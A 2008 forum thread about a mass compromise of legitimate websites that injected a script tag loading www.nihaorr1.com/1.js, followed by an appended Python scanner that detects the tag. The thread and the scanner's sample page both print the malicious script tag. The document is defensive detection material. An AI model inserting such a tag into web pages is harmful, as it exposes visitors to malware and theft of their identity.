Anyone know about www.nihaorr1.com/1.js?
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 11, 2008 05:55 AM|kimrennin
The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated with an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor.

The worst part of it all is that these infestations are not in seamy Web sites; they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitor's machine to find ways to compromise it. Exploits are then downloaded and used to infect the redirected visitor based on the information found in the scan.
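
The check described in the post above, as an added example that is not part of the original post or thread: a Python scanner that walks a web root and reports script tags loading the string quoted there. The function names, the file-extension list, the tolerance for quoted and upper-case variants of the tag, and the three sample pages are assumptions made for this sketch.

```python
import os
import re
import tempfile

# Indicator quoted in the post: <script src=http://www.nihaorr1.com/1.js>
INDICATOR_HOST = "www.nihaorr1.com"
INDICATOR_PATH = "/1.js"

# src may be bare (as in the post) or quoted; quoting and case are assumed variants.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def find_injected(text):
    """Return [(line_number, url)] for script tags that load the indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SCRIPT_SRC.finditer(line):
            url = m.group(1)
            rest = re.sub(r"^(?:https?:)?//", "", url, flags=re.I)
            host, _, path = rest.partition("/")
            path = "/" + path.split("?")[0].split("#")[0]
            if host.lower() == INDICATOR_HOST and path.lower() == INDICATOR_PATH:
                hits.append((lineno, url))
    return hits

def scan_tree(root, exts=(".htm", ".html", ".asp", ".aspx")):
    """Walk root and return {relative_path: hits} for files with matches."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(exts)):
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = find_injected(fh.read())
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Scan constructed pages: clean, infected, and one that only quotes the tag."""
    pages = {
        "clean.html": "<html><body>Hello</body></html>\n",
        "news.asp": "<h1>Title</h1>\n<td>Item<script src=http://www.nihaorr1.com/1.js></script></td>\n",
        "forum.html": "<p>Look for &lt;script src=http://www.nihaorr1.com/1.js&gt;</p>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in pages.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Calling scan_tree on a real content directory gives the same per-file report. A page that only mentions the tag in escaped form, such as a forum post discussing it, is not flagged.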